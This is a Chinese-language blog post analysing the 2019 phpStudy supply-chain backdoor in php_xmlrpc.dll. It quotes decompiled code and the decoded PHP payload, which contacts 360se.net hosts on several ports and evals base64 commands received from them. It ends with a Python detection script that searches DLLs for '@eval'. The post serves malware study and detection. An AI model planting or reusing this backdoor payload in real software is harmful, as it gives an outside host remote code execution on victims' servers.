2019.9.20得知非官網的一些下載站中的phpstudy版本存在後門文件 說是官網下的就沒有後門php
20號出現的新聞 今天phpstudy官網21號又更新一波 不太好說這是什麼操做哦 欲蓋彌彰?web
很開心的說 我之前的虛擬機裝的應該是有後門版本(任何文件我歷來都是官網下文件) 用chamd5的檢測pyshell
哎~~學個php都被搞哦 跟着大佬團隊文章也動手找找後門把socket
chamd5團隊老哥發現是php_xmlrpc.dll中的問題 直接站人家肩膀把 看看這個dlltcp
php_xmlrpc.dll @eval函數函數
.data:1000DE98編碼
gzuncompress函數解密執行payload 之前webshell大馬免殺常常用的函數- -spa
.data:1000DE98 函數sub_10003490.net
145-177行:3d
while ( 1 ) { if ( *(_DWORD *)v13 == 39 ) { v10[v12] = 92; v43[v12 + 1] = *v11; v12 += 2; v13 += 8; } else { v10[v12++] = *v11; v13 += 4; } v11 += 4; if ( (signed int)v11 >= (signed int)asc_1000C66C ) break; v10 = v43; } spprintf(&v43, 0, a_evalSS, aGzuncompress, v43); v24 = *(_DWORD *)(*a3 + 4 * executor_globals_id - 4); v25 = *(_DWORD *)(v24 + 296); *(_DWORD *)(v24 + 296) = &v33; v40 = v25; v26 = setjmp3(&v33, 0); v27 = v40; if ( v26 ) { v28 = a3; *(_DWORD *)(*(_DWORD *)(*a3 + 4 * executor_globals_id - 4) + 296) = v40; } else {
這裏@eval gzuncompress('%s')進行拼接,調用gzuncompress方法解密執行payload,之前webshell大馬免殺常常用的函數,上面也看到了函數地址
而gzuncompress解密前的代碼是這裏的v43
下面是zend_eval_string處執行v43處gzuncompress編碼的代碼
} else { v28 = a3; zend_eval_string(v43, 0, &byte_10011B34, a3); } *(_DWORD *)(*(_DWORD *)(*v28 + 4 * executor_globals_id - 4) + 296) = v27; if ( dword_1000C010 < 3600 ) dword_1000C010 += 3600; ftime(&dword_10011D50); }
v43處執行的代碼經過解碼:
@ini_set("display_errors","0"); error_reporting(0); $h = $_SERVER['HTTP_HOST']; $p = $_SERVER['SERVER_PORT']; $fp = fsockopen($h, $p, $errno, $errstr, 5); if (!$fp) { } else { $out = "GET {$_SERVER['SCRIPT_NAME']} HTTP/1.1\r\n"; $out .= "Host: {$h}\r\n"; $out .= "Accept-Encoding: compress,gzip\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); fclose($fp); }
拼接後v43後解密的代碼 明顯的fsockopen通訊 反彈後門到360se.net的20123端口
@ini_set("display_errors","0"); error_reporting(0); function tcpGet($sendMsg = '', $ip = '360se.net', $port = '20123'){ $result = ""; $handle = stream_socket_client("tcp://{$ip}:{$port}", $errno, $errstr,10); if( !$handle ){ $handle = fsockopen($ip, intval($port), $errno, $errstr, 5); if( !$handle ){ return "err"; } } fwrite($handle, $sendMsg."\n"); while(!feof($handle)){ stream_set_timeout($handle, 2); $result .= fread($handle, 1024); $info = stream_get_meta_data($handle); if ($info['timed_out']) { break; } } fclose($handle); return $result; } $ds = array("www","bbs","cms","down","up","file","ftp"); $ps = array("20123","40125","8080","80","53"); $n = false; do { $n = false; foreach ($ds as $d){ $b = false; foreach ($ps as $p){ $result = tcpGet($i,$d.".360se.net",$p); if ($result != "err"){ $b =true; break; } } if ($b)break; } $info = explode("<^>",$result); if (count($info)==4){ if (strpos($info[3],"/*Onemore*/") !== false){ $info[3] = str_replace("/*Onemore*/","",$info[3]); $n=true; } @eval(base64_decode($info[3])); } }while($n);
檢查腳本 來自chamd5團隊腳本,在phpstudy目錄下執行便可遞歸檢查
# -*- coding:utf8 -*- __author__='pcat@chamd5.org' __blog__='http://pcat.cc' import os import string import re def strings(file) : chars = string.printable[:94] shortestReturnChar = 4 regExp = '[%s]{%d,}' % (chars, shortestReturnChar) pattern = re.compile(regExp) with open(file, 'rb') as f: return pattern.findall(f.read()) def grep(lines,pattern): for line in lines: if pattern in line: yield line def pcheck(filename): # trojan feature trojan='@eval' # just check dll file if filename.endswith('.dll'): lines=strings(filename) try: grep(lines,trojan).next() except: return print '=== {0} ==='.format(filename) for line in grep(lines,trojan): print line pass def foo(): # . stand for current directory for path, dirs, files in os.walk(".", topdown=False): for name in files: pcheck(os.path.join(path, name)) for name in dirs: pcheck(os.path.join(path, name)) pass if __name__ == '__main__': foo()
本身斟酌哦 太菜了呢學個php都給人家當雞